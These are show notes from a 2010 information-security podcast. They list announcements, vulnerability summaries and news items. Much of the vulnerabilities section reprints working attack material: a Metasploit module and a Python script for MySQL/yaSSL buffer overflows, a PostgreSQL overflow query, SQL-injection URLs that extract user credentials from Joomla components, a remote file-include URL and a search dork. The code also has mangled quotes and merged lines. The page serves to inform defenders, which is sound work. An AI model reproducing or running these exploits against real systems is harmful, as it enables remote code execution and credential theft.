InfoSec Podcast Episode 56 for January 28, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
FORENSICS-606: Drive and Data Recovery Forensics (Canceled)
Louisville OWASP Chapter – Fourth Meeting, Friday January 29th, 2010
Please Note: RSVP Required! The meeting location this quarter has a capacity of 40 persons. Please send your RSVP as soon as possible to ensure a seat and lunch. We apologize for any inconvenience this may cause and are seeking a larger venue for future meetings.
To RSVP: Just send a reply to brian.r.blankenship@gmail.com and indicate how many are coming.
Date/Time: January 29th, 11:30 – 1:00PM
Location: MetroSafe Building, 410 S. Fifth Street. (there is a parking lot across the street, and a parking garage 1/2 block away).
Lunch is being provided by Imperva and Accuvant.
Speaker: Rafal Los will be discussing Flash and Web 2.0 security (see bio below)
“Rafal Los, Security Specialist with Hewlett-Packard’s Application Security Center (ASC), is an industry veteran who has worked in a variety of security positions— from consultant to Information Security Officer in the Fortune 100— within some of the most demanding business environments. Rafal’s unique blend of technical expertise and business knowledge enable him to teach audiences about security techniques, programs and processes that they can both understand strategically, and realistically apply. He has extensive experience in security testing, risk analysis and management, penetration testing and architecture and policy. Previous successes include building and implementing a successful web application security program for one of the largest and most diverse companies in the world.”
Vulnerabilities of Interest:
- yaSSL is subject to multiple remote buffer-overflow vulnerabilities.Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of applications using the library. Failed attacks will cause denial-of-service conditions. yaSSL 1.7.5 is vulnerable to these issues; other versions are also likely to be affected. Proof-of-concept and exploit code are available:
##
# $Id: mysql_yassl_hello.rb 8242 2010-01-26 20:12:13Z jduck $
####
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRankinginclude Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘MySQL yaSSL SSL Hello Message Buffer Overflow’,
‘Description’ => %q{
This module exploits a stack overflow in the yaSSL (1.7.5 and earlier)
implementation bundled with MySQL <= 6.0. By sending a specially crafted
Hello packet, an attacker may be able to execute arbitrary code.
},
‘Author’ => [ 'MC' ],
‘License’ => MSF_LICENSE,
‘Version’ => ‘$Revision: 8242 $’,
‘References’ =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195'],
[ 'BID', '27140' ],
],
‘Privileged’ => true,
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘thread’,
},
‘Payload’ =>
{
‘Space’ => 600,
‘BadChars’ => “\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c”,
‘StackAdjustment’ => -3500,
‘PrependEncoder’ => “\x81\xc4\x54\xf2\xff\xff”,
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
[ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ],
[ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ],
],
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘Jan 4 2008′))register_options([ Opt::RPORT(3306) ], self)
enddef exploit
connectsock.get_once
req_uno = [0x01000020].pack(‘V’)
req_dos = [0x00008daa].pack(‘V’) + [0x40000000].pack(‘V’)
req_dos << [0x00000008].pack(‘V’) + [0x00000000].pack(‘V’)
req_dos << [0x00000000].pack(‘V’) + [0x00000000].pack(‘V’)
req_dos << [0x00000000].pack(‘V’) + [0x00000000].pack(‘V’)
req_dos << [0x03010000].pack(‘V’) + [0x00000001].pack(‘V’)
req_dos << “\x00\x0F\xFF” + rand_text_alphanumeric(3917 – payload.encoded.length)
req_dos << make_nops(100) + payload.encoded + [target.ret].pack(‘V’)
req_dos << make_nops(16) + [0xe8, -650].pack(‘CV’) + rand_text_alphanumeric(1024)print_status(“Trying target #{target.name}…”)
sock.put(req_uno)
sock.put(req_dos)handler
disconnect
endend
- MySQL compiled with yaSSL is subject to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. MySQL 5.5.0-ms2 is vulnerable when compiled with yaSSL; other versions may also be affected.
#!/usr/bin/env python
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED “AS IS” AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.“”"
Usage: mysql_overflo1.py localhostMySQL yassl cert parsing stack overflow
Debug session on 5.5.0-m2
suse11:~ # gdb -q
(gdb) att 5542
Attaching to process 5542
Reading symbols from /var/mysql/libexec/mysqld…cdone.
…
0xffffe430 in __kernel_vsyscall ()
(gdb) c
Continuing.Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb6bbab90 (LWP 5545)]
0×41424344 in ?? ()
(gdb)“”"
import os
import getopt
import sys
import socket
import time
import telnetlib
import struct
import base64
import randomclass theexploit:
def __init__(self,host):
self.host = host
self.port = 3306def gettcpsock(self):
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sockdef int2berlen(self,i):
e=self.int2ber(i, signed=0)
if i <= 127:
return e
else:
l=len(e)
return chr(0×80|l) + edef int2ber(self,i, signed=1):
encoded=”
while ((signed and (i>127 or i<-128))
or (not signed and (i>255))):
encoded=chr(i%256)+encoded
i=i>>8
encoded=chr(i%256)+encoded
return encodeddef big_endian_24(self, length):
l1 = (length & 0xff0000) >> 16;
l2 = (length & 0xff00) >> 8;
l3 = length & 0xff;
size = chr(l1) + chr(l2) + chr(l3)
return sizedef attack_mysql(self):
sock = self.gettcpsock()
sock.connect((self.host, self.port))
#sock.set_timeout(30.0)print “press any key”
sys.stdin.readline()s=sock.recv(8000)
print ss =”\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00″
s+=”\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
s+=”\x00\x00\x00\x00″
s+=”\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1″
s+=”\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5″
s+=”\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39″
s+=”\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f”
s+=”\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12″
s+=”\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06″
s+=”\x00\x03\x02\x01\x00″sock.sendall(s)
print “Sent SSL_CLIENT_HELLO”sock.sendall(self.make_overflow())
print “Sent SSL_CLIENT_CERTIFICATE”
sock.close()def run(self):
self.attack_mysql()
return 0def make_overflow(self):
retaddr=0×41424344
cn=”"
cn += “\x00″* 1062
cn+=struct.pack (“<L”,retaddr)*6
#cn += “\x40″ * 100
#cn += “\xcc”*100
#cn += “\x40″ * 100cert = “\x2a\x86\x00\x84″ + struct.pack(“>L”,len(cn)) + cn
cert = “\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02″ + cert
cert =”\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00″ + cert
cert = “\x30″ + self.int2berlen(len(cert)) + cert
cert = “\x30″ + self.int2berlen(len(cert)) + certcert1 = self.big_endian_24(len(cert)) + cert
certs = self.big_endian_24(len(cert1)) + cert1handshake = “\x0b” + self.big_endian_24(len(certs)) + certs
msg = “\x16\x03\x01″ + struct.pack(“>H”,len(handshake)) + handshakereturn msg
if __name__==”__main__”:
app = theexploit(sys.argv[1])
app.run() - PostgreSQL is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application. PostgreSQL 8.0.23 is vulnerable; other versions may also be affected. Proof of concept is available: testdb=# select substring(B’10101010101010101010101010101010101010101010101′,33,-15);
- VirtueMart is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:
http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=[SQL]&option=com_virtuemart
http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart
http://www.sample.com/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version
- MiFi 2352 is subject to an information-disclosure vulnerability that may expose sensitive information. Successful exploits will allow authenticated attackers to obtain passwords, which may aid in further attacks. MiFi 2352 access point firmware 11.47.17 is vulnerable; other versions may also be affected. Example URLs:
http://www.sample.com/config.xml.sav
http://www.sample.com/config.xml.save
- e107 is subject to an unspecified remote vulnerability. Very little is known about this issue. Versions prior to e107 0.7.17 are vulnerable. This issue was exploited in an attack against the vendor’s website. Currently we are not aware of any publicly available exploits.
- phpYabs is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. phpYabs 0.1.2 is vulnerable; other versions may also be affected. Example URL: http://www.sample.com/phpyabs/moduli/libri/index.php?Azione=[SHELL] GoogleDork: inurl: phpyabs/moduli/libri/index.php
- The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:
http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=4%23&newmonth=01
http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=5%23&newmonth=01
http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=4%23
http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=5%23
News Items of Interest:
News item 1: http://www.businesswire.com/portal/site/topix/?ndmViewId=news_view&newsId=20100127005098&newsLang=en
An IT security expert and blogger claims to have successfully intercepted and compromised phone calls made using 12 commercially available mobile voice encryption products. PhoneCrypt from SecurStar was one of only three solutions that successfully blocked the attacks that were made using a simple wiretapping Trojan.
“Like most security breaches, Notrax went for the weakest link; he did not attempt to crack the encryption itself, but used simple wiretapping techniques”
Using a readily available wiretapping utility, costing as little as $100, as well as his own ‘homemade’ Trojan, the blogger – aka Notrax – was able to by-pass the encryption and eavesdrop by capturing conversations from the microphone and speaker in real time. By suppressing any rings, notifications or call logs, these attacks go completely undetected. And while Trojans can be installed manually by someone with access to the phone, they could equally be delivered via email, SMS or a mobile application.
Notrax describes his tests extensively at www.infosecurityguard.com with links to Youtube videos.
News item 2: http://www.newsfactor.com/story.xhtml?story_id=12200DUI6NKA&full_skip=1
In a move that could invigorate weak sales of Google’s Nexus One smartphone, Wal-Mart, the world’s largest retailer, appears ready to start selling the device. According to one online report, the cost could be as low as $99 — much lower than the subsidized $179 price from T-Mobile with a two-year plan.
News item 3: http://www.internetnews.com/security/article.php/3860871
Data breach incidents cost companies an average of $6.75 million each time, according to a new study released by security researcher The Ponemon Institute and PGP Corp., an e-mail and data encryption security software developer.
And while the study found that the total number of reported data breaches declined from 657 incidents in 2008 to 498 last year, the average cost inched up from $202 to $204 per customers record.
The firms’ joint U.S. Cost of Data Breach Study chronicles a wide range of cost factors, including the outlays for detection, escalation, notification and response along with legal, investigative and administrative expenses, customer defections, opportunity loss and reputation management.
The $6.75 million cost per incident was slightly higher than the $6.65 million enterprise clients shelled out in 2008. Those figures include the costs associated with customer support such as information hotlines and credit monitoring subscriptions.
Technical Segment: http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php